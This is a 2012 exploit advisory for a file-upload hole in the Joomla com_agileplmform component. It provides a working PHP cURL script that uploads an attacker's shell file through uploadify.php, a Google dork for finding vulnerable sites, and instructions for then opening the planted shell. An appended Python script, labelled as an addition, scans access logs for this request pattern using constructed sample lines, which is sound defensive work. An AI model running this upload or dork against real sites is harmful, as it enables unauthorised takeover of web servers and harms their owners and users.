Exploit: Joomla com_agileplmform file upload vulnerability

Published: 2012.08.04
Credit: Tunisian spl01t3r
Risk: High
CWE: N/A
CVE: N/A
Local: No
Remote: Yes
Dork: inurl:components/com_agileplmform

Plain text version

+----------------------------------------------------------------------+
# Exploit Title: joomla component com_agileplmform file upload vulnerability
# Google Dork: inurl:components/com_agileplmform
# Date: 04/08/2012
# Author: Tunisian spl01t3r

+----------------------------------------------------------------------+

[+] exploit



<?php
/* example of using
$uploadfile="C:\AppServ\www\Tunisia.php"; */
$uploadfile="C:\AppServ\www\b.php";
$ch = curl_init("http://[SERVER]/[path]/components/com_agileplmform/views/agileplmform/js/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/components/com_agileplmform/views/agileplmform/js/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

[+] How to use
Tunisia.php must be the devil file 3:)
!!!shell!!!
TN> http://[SERVER]/[path]/components/com_agileplmform/views/agileplmform/js/
Filename : $postResult output

+----------------------------------------------------------------------+
[+] greetz to : BIbou sfaxien ; mech lazem ; tn_scorpion ; anas laaribi ;
jendoubi ahmed ; s-man ; chaouki mkachakh & ;) --Geni ryodan-- ;)
daly azrail ; med bradai ; 7rouz ; ghazy info ; mohamed bel ;
hassen ben mbarek ; prince bibou ; hag whag ; anis van toets
& all tn_spl01t3r's friends
mAhna mAhna

[+] profile : www.facebook.com/TN.spl0it3r

+----------------------------------------------------------------------+
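
For defenders, the request pattern in this advisory (a POST to the component's uploadify.php, then requests for a script file in the same js/ directory) can be searched for in web server access logs. The following is an added example, not part of the original advisory: the function name `find_upload_abuse`, the combined log format, the extension list, the `/joomla` path prefix and the sample log lines are all assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Directory the advisory names as both upload handler location and upload target.
COMPONENT_DIR = "/components/com_agileplmform/views/agileplmform/js/"
HANDLER = "uploadify.php"
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")  # assumed executable extensions

# Apache/nginx "combined" access log layout (an assumption about the server).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_upload_abuse(lines):
    """Flag POSTs to the upload handler and requests for scripts beside it."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        # Drop the query string, decode percent-encoding, compare case-insensitively.
        path = unquote(m["uri"].split("?", 1)[0]).lower()
        idx = path.find(COMPONENT_DIR)
        if idx == -1:
            continue
        name = path[idx + len(COMPONENT_DIR):]
        if m["method"] == "POST" and name == HANDLER:
            kind = "upload-handler-post"
        elif name != HANDLER and name.endswith(SCRIPT_EXT):
            kind = "script-in-upload-dir"
        else:
            continue
        findings.append({"kind": kind, "ip": m["ip"], "ts": m["ts"],
                         "path": path, "served": m["status"].startswith("2")})
    return findings

_P = "/joomla" + COMPONENT_DIR  # constructed install prefix
# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    f'203.0.113.7 - - [04/Aug/2012:10:01:02 +0000] "POST {_P}uploadify.php HTTP/1.1" 200 12 "-" "-"',
    f'203.0.113.7 - - [04/Aug/2012:10:01:09 +0000] "GET {_P}b.php HTTP/1.1" 200 5 "-" "-"',
    f'198.51.100.4 - - [04/Aug/2012:10:02:00 +0000] "GET {_P}jquery.uploadify.js HTTP/1.1" 200 900 "-" "-"',
    f'198.51.100.9 - - [04/Aug/2012:10:03:00 +0000] "GET {_P}uploadify.php HTTP/1.1" 200 0 "-" "-"',
    f'198.51.100.9 - - [04/Aug/2012:10:04:00 +0000] "GET {COMPONENT_DIR}%62.PHP?x=1 HTTP/1.1" 404 210 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(finding)
```

A finding of kind `script-in-upload-dir` with `served` set to true means the server returned a script from the upload directory and the host should be examined for files that do not belong to the component.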

Copyright 2014, cxsecurity.com